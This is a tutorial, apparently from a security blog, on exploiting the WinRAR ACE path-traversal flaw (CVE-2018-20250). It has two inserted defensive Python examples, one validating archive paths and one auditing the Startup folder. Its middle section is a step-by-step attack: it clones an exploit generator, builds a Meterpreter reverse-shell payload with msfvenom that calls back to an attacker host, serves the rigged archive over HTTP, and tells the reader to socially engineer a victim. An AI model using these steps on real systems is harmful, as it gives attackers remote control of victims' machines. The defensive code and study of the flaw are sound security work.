In this post we look at a serious security flaw that WinRAR, one of the world's most popular Windows file compression applications, patched last month. It can only be exploited by tricking a WinRAR user into extracting a malicious archive. The vulnerability, identified last year by research.checkpoint.com, affects all WinRAR versions released over the past 19 years.
More About Evil WinRAR
CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253
Patched Version: WinRAR 5.70 Beta 1
This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR. WinRAR uses the ACE format to compress folders and unpacks ACE archives with the help of UNACEV2.DLL.
In WinRAR versions prior to and including 5.61, there is a path traversal vulnerability in the handling of the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored and the filename is treated as an absolute path. This happens because the filename is not properly validated when UNACEV2.dll processes it.
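To make the root cause concrete, here is an added Python example (not code from the original post, and not WinRAR's or the Evil-WinRAR-Gen project's code) that contrasts a naive extractor, which joins the archive member name onto the destination folder and so silently discards the destination when the name is absolute or climbs out with "..", with a hardened check that normalizes the result and refuses any member that lands outside the extraction folder. It uses Python's ntpath module so the Windows path semantics are reproduced on any OS; the destination folder and member names are constructed sample values.

```python
import ntpath  # Windows path semantics, usable on any OS

# Constructed sample extraction folder (the user's chosen destination).
DEST = r"C:\Users\victim\Downloads\extracted"

# Constructed sample member names as they might appear in an archive's
# filename field: one benign, one absolute, one relative traversal.
SAMPLE_MEMBERS = [
    r"docs\readme.txt",
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winrar.exe",
    r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winrar.exe",
]


def naive_target(dest: str, member_name: str) -> str:
    """Mirrors the flawed behaviour: a plain join. If member_name is
    absolute, ntpath.join drops dest entirely; if it contains '..',
    the result walks out of dest once the OS resolves it."""
    return ntpath.join(dest, member_name)


def safe_target(dest: str, member_name: str) -> str:
    """Hardened version: normalize the joined path and require that it
    stays inside dest. Raises ValueError for anything that escapes."""
    dest_norm = ntpath.normpath(dest)
    candidate = ntpath.normpath(ntpath.join(dest_norm, member_name))
    # Windows paths are case-insensitive, so compare case-folded strings.
    inside = candidate.lower().startswith(dest_norm.lower() + ntpath.sep)
    if not inside:
        raise ValueError(f"member escapes extraction folder: {member_name!r}")
    return candidate


def is_safe_member(dest: str, member_name: str) -> bool:
    """Boolean wrapper around safe_target for use in scanning loops."""
    try:
        safe_target(dest, member_name)
        return True
    except ValueError:
        return False


def classify_members(dest: str, members) -> dict:
    """Return {member_name: 'ok' | 'ESCAPES'} for every member name."""
    return {m: ("ok" if is_safe_member(dest, m) else "ESCAPES") for m in members}


if __name__ == "__main__":
    for name in SAMPLE_MEMBERS:
        print("naive ->", naive_target(DEST, name))
        print("safe  ->", "ESCAPES" if not is_safe_member(DEST, name) else safe_target(DEST, name))
        print()
```

The second and third sample members both resolve to the user's Startup folder under the naive join, which is exactly the "destination folder is ignored" behaviour described above; the hardened check rejects both while still allowing the ordinary relative name.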
Let's download a Python script that generates a malicious archive in rar format. Once you have downloaded the script, install the dependencies it requires.
git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt
Next, make the Python script inside the Evil-WinRAR-Gen folder executable, then generate a malicious exe file with msfvenom, naming it "winrar.exe" as shown, and start a multi/handler inside Metasploit.
chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe
Now create a text file that will be displayed to the victim when he extracts the rar file, to distract him. Then run the evilWinRAR Python script with the malicious exe file and the text file, producing a malicious archive that you can send to the target.
touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080
As said, this vulnerability allows us to extract the malicious file to an arbitrary path; with the help of this script we make the archive extract into the Startup folder. Now use social engineering to transfer the malicious rar to the victim and wait for the victim to restart his machine to obtain a reverse connection from the target.
There is currently no startup program on the target machine, as shown below. Once the victim extracts the malicious rar file "evil.rar", our winrar.exe backdoor is extracted into the Startup folder.
To check for the winrar.exe file in the Startup folder, type shell:startup in the Run prompt.
As soon as the victim restarts the machine, you will get a reverse connection as shown.
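From the defender's side, the shell:startup check above is the thing to automate: anything newly written into a user's Startup folder, especially an executable that arrived via an archive extraction, deserves a look. The following added Python example (not part of the original post or of any tool it mentions) audits a Startup folder and reports each file's type, age and SHA-256, flagging executable types and files modified within the last few days. The user_startup_dir helper derives the real per-user path from the APPDATA environment variable on Windows; the make_demo_folder helper builds a constructed sample folder so the audit can be exercised on any OS.

```python
import hashlib
import os
import tempfile
import time

# File types that normally have no business sitting in a Startup folder
# unless the user put them there deliberately (constructed list).
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".lnk"}


def user_startup_dir() -> str:
    """Per-user Startup folder, the same location shell:startup opens.
    Builds the path from APPDATA; on a non-Windows host this is only a placeholder."""
    appdata = os.environ.get("APPDATA", "")
    return os.path.join(appdata, "Microsoft", "Windows", "Start Menu", "Programs", "Startup")


def sha256_of(path: str) -> str:
    """Hash the file contents so a finding can be matched against known binaries."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_startup(folder: str, recent_days: float = 7.0, now: float = None) -> list:
    """Return one finding dict per regular file in folder. A file is
    'suspicious' when it is an executable type OR was modified recently."""
    now = time.time() if now is None else now
    findings = []
    for entry in sorted(os.scandir(folder), key=lambda e: e.name.lower()):
        if not entry.is_file():
            continue
        ext = os.path.splitext(entry.name)[1].lower()
        age_days = (now - entry.stat().st_mtime) / 86400.0
        is_exec = ext in EXECUTABLE_EXTS
        is_recent = age_days <= recent_days
        findings.append({
            "name": entry.name,
            "ext": ext,
            "age_days": round(age_days, 2),
            "sha256": sha256_of(entry.path),
            "executable_type": is_exec,
            "recent": is_recent,
            "suspicious": is_exec or is_recent,
        })
    return findings


def make_demo_folder() -> str:
    """Constructed sample Startup folder: one old benign text note and one
    freshly dropped executable-type file (contents are placeholder bytes)."""
    folder = tempfile.mkdtemp(prefix="startup_demo_")
    old = os.path.join(folder, "notes.txt")
    with open(old, "wb") as fh:
        fh.write(b"reminder: nothing to see here\n")
    thirty_days_ago = time.time() - 30 * 86400
    os.utime(old, (thirty_days_ago, thirty_days_ago))
    with open(os.path.join(folder, "winrar.exe"), "wb") as fh:
        fh.write(b"MZ placeholder, not a real PE\n")  # constructed content
    return folder


def suspicious_names(findings: list) -> list:
    """Names of the flagged entries, for a quick summary line."""
    return [f["name"] for f in findings if f["suspicious"]]


if __name__ == "__main__":
    target = user_startup_dir() if os.path.isdir(user_startup_dir()) else make_demo_folder()
    for f in audit_startup(target):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['name']:20} age={f['age_days']:>7} days sha256={f['sha256'][:16]}...")
```

Run it on a schedule (or after an archive-handling alert) and diff the output against the previous run; a new executable-type entry whose hash is unknown to you is the signature of the drop described in this post, and the age field separates a fresh arrival from a long-standing, deliberately placed shortcut.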